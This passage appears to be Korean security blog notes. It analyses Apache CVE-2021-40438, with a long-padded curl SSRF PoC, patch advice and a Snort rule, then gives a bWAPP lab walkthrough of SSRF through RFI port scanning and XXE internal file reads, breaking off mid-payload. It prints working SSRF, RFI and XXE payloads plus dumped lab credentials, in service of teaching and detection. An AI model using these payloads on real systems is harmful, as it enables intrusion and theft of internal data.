AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://google.com/"

- URL 직접 접근 시 마찬가지로 google.com으로 리다이렉트

- 위 패킷을 와이어 샤크로 확인해보면 [사진 5]와 같음

2.2 분석

- 해당 취약점은 URI 검증 중 proxy_util.c의 "fix_uds_filename()" 함수에서 발생

- 해당 함수는 mod_proxy 내에서 UDS(Unix Domain Socket) 리디렉션을 결정하는 함수로 판단됨.

- 일반적으로 "unix:" 문자열을 URI 어딘가에 위치시킴으로써 리다이렉션에 사용할 실제 URI를 추출

- 이러한 URI는 Apache 내부적으로 생성되어야 하지만, 임의 도메인 소켓에 대한 접근이 가능함으로 인해 SSRF 취약점이 발생

- 추가적으로, 공격을 위한 코드가 긴 이유는 길이 검증 연산인 APR_PATH_MAX에서 오류를 반환하기 위함.

- 길이 검증에서 발생한 오류는 ap_runtime_dir_relative()에서 NULL을 반환

※ ap_runtime_dir_relative()는 [사진 6]의 fix_uds_filename()에 의해 호출되며, 반환된 값에 대한 추가 검증이 없음.

- 반환된 NULL 값은 공격자가 요청한 임의 URL로 덮어 쓰게 되는 것으로 판단됨. 즉, 오류를 통해 우회가 가능 

2.3 PoC

- PoC의 구성은 다음과 같음

① source (취약한 서버)에 unix 매개변수의 값을 다수의 A로 덮어씀

② 2.2 분석에서 확인된 취약점과 오류를 통해 공격 대상 서버 (victim)로 요청이 리다이렉트 됨

curl "https://source/?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|https://victim"

3. 대응방안

3.1 서버 측면

① Apache HTTP Server 2.4.49 버전 이상으로 업그레이드

- 패치 코드는 2277, 2278 라인을 통해 사용자 입력값에 대한 길이 검증을 수행하는 것으로 판단됨

3.2 네트워크 측면

① 공개된 PoC를 통해 탐지 정책을 적용

- "?unix:"와 "|http"를 사용하는 것이 확인됨

- "3a", "7c"는 각각 ":", "|"와 대응됨

alert tcp any any -> any any (msg:"Apache HTTP Server SSRF (CVE-2021-40438)"; flow:established,from_client; urilen:>200; content:"GET"; http_method; content:"/?unix|3a|"; http_uri; nocase; fast_pattern; content:"|7c|http"; http_uri;)

4. 참고

- https://nvd.nist.gov/vuln/detail/CVE-2021-40438

- https://github.com/sixpacksecurity/CVE-2021-40438

- https://www.wangan.com/p/7fygfy122c313bee

- https://cydrill.com/owasp/apache-ssrf-an-all-you-can-eat-reverse-proxy/

- https://github.com/apache/httpd/commit/520dcd80a45ce237e9a46ee28697e1b8af3fcd7e

- https://www.leavesongs.com/PENETRATION/apache-mod-proxy-ssrf-cve-2021-40438.html

- https://firzen.de/building-a-poc-for-cve-2021-40438

- https://koromoon.blogspot.com/2021/12/cve-2021-40438-apache-http-server.html

1. SSRF (Server-Side Request Forgery)

- 서버 측에서 위조된 요청을 보내도록 하여 일반적으로 사용자들이 접근할 수 없었던 내부 자원에 접근하여 악성행위가 가능한 취약점

- 즉, 취약한 서버를 이용하여 공격자가 내부 서버에 원하는 요청을 전송하여 정보를 탈취하는 공격 유형

- XSS (Cross-site Scripting) : 공격자가 삽입한 악성 스크립트가 사용자의 PC에서 실행
- CSRF (Cross Site Request Forgery) : 공격자가 삽입한 악성 스크립트가 사용자의 권한으로 서버에서 실행
- SSRF (Server-Side Request Forgery) : 공격자의 조작된 요청을 서버에서 실행

2. bWAPP 실습

- bWAPP의 SSRF에서는 3가지 유형에 대해 실습이 가능함

- 각 공격에 사용되는 파일은 3가지가 있으며, [사진 2]와 순서대로 대응

2.1 RFI를 이용한 Port scan

- ssrf-1.txt 파일 이용

- fsockopen은 소켓 오픈 여부를 확인하는 PHP 함수로, 해당 파일은 ip 매개변수로 받은 IP에서 Open된 Port를 조회하는 파일임

echo "<script>alert(\"U 4r3 0wn3d by MME!!!\");</script>";

if(isset($_REQUEST["ip"]))
{
    
    //list of port numbers to scan
    $ports = array(21, 22, 23, 25, 53, 80, 110, 1433, 3306);
    
    $results = array();
    
    foreach($ports as $port)
    {

        if($pf = @fsockopen($_REQUEST["ip"], $port, $err, $err_string, 1))
        {

            $results[$port] = true;
            fclose($pf);
            
        }
        
        else
        {

            $results[$port] = false;        

        }

    }
 
    foreach($results as $port=>$val)
    {

        $prot = getservbyport($port,"tcp");
        echo "Port $port ($prot): ";

        if($val)
        {

            echo "<span style=\"color:green\">OK</span><br/>";

        }

        else
        {

            echo "<span style=\"color:red\">Inaccessible</span><br/>";

        }

    }

}
?>

- Remote & Local File Inclusion (RFL/LFI)로 이동 후 Go를 클릭하면 URL이 다음과 같이 변경

http://192.168.56.109/bWAPP/rlfi.php?language=lang_en.php&action=go

- ssrf-1.txt에서 ip 매개변수가 필요한 것을 확인하였으므로, URL을 변경

① ssrf-1.txt 파일의 경로를 language 매개변수에 전달 > 포트스캔 수행

② ip 매개변수에 127.0.0.1 전달 > 루프백(자기자신=서버)

http://192.168.56.109/bWAPP/rlfi.php?language=http://192.168.56.109/evil/ssrf-1.txt&action=go&ip=127.0.0.1

- 위 URL로 요청을 전송 시 bWAPP서버에대한 포트 스캔 결과가 확인됨

2.2 XXE를 이용한 내부망 자원 접근

- ssrf-2.txt 파일 내용 확인

# Accesses a file on the internal network (1)

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
 <!ENTITY bWAPP SYSTEM "http://localhost/bWAPP/robots.txt">
]>
<reset><login>&bWAPP;</login><secret>blah</secret></reset>


# Accesses a file on the internal network (2)
# Web pages returns some characters that break the XML schema > use the PHP base64 encoder filter to return an XML schema friendly version of the page!

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
 <!ENTITY bWAPP SYSTEM "php://filter/read=convert.base64-encode/resource=http://localhost/bWAPP/passwords/heroes.xml">
]>
<reset><login>&bWAPP;</login><secret>blah</secret></reset>

2.2.1 Accesses a file on the internal network (1)

- SQL Injection - Stored (XML) 이동 및 프록시 설정 후 버프슈트 실행

- [사진 6]에서 Any bugs? > 버프슈트 Send to Repeater > 내용 작성 > Send

- 해당 요청의 결과로 bWAPP서버에 설정된 robots.txt 파일의 내용이 노출됨

2.2 Accesses a file on the internal network (2)

- [사진 6]에서 Any bugs? > 버프슈트 Send to Repeater > 내용 작성 > Send

- [사진 8]에서 확인된 응답을 버프슈트의 Decoder에서 based64로 디코딩한 결과 /bWAPP/passwords/heroes.xml 파일의 내용이 노출됨

<?xml version="1.0" encoding="UTF-8"?>
<heroes>
	<hero>
		<id>1</id>
		<login>neo</login>
		<password>trinity</password>
		<secret>Oh why didn't I took that BLACK pill?</secret>
		<movie>The Matrix</movie>
		<genre>action sci-fi</genre>
	</hero>
	<hero>
		<id>2</id>
		<login>alice</login>
		<password>loveZombies</password>
		<secret>There's a cure!</secret>
		<movie>Resident Evil</movie>
		<genre>action horror sci-fi</genre>
	</hero>
	<hero>
		<id>3</id>
		<login>thor</login>
		<password>Asgard</password>
		<secret>Oh, no... this is Earth... isn't it?</secret>
		<movie>Thor</movie>
		<genre>action sci-fi</genre>
	</hero>
	<hero>
		<id>4</id>
		<login>wolverine</login>
		<password>Log@N</password>
		<secret>What's a Magneto?</secret>
		<movie>X-Men</movie>
		<genre>action sci-fi</genre>
	</hero>
	<hero>
		<id>5</id>
		<login>johnny</login>
		<password>m3ph1st0ph3l3s</password>
		<secret>I'm the Ghost Rider!</secret>
		<movie>Ghost Rider</movie>
		<genre>action sci-fi</genre>
	</hero>
	<hero>
		<id>6</id>
		<login>selene</login>
		<password>m00n</password>
		<secret>It wasn't the Lycans. It was you.</secret>
		<movie>Underworld</movie>
		<genre>action horror sci-fi</genre>
	</hero>
</heroes>

2.3 XXE를 이용한 삼성 스마트 TV 공격 (CVE-2013-4890)

- CVE-2013-4890는 Samsung PS50C7700 TV의 DMCRUIS/0.1 웹 서버에 GET 요청으로 A를 300개 설정 후 TCP/5600으로 전송하면 서비스가 중지되는 취약점

- ssrf-3.txt 파일 내용

# Crashes my Samsung SmartTV (CVE-2013-4890) ;)

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
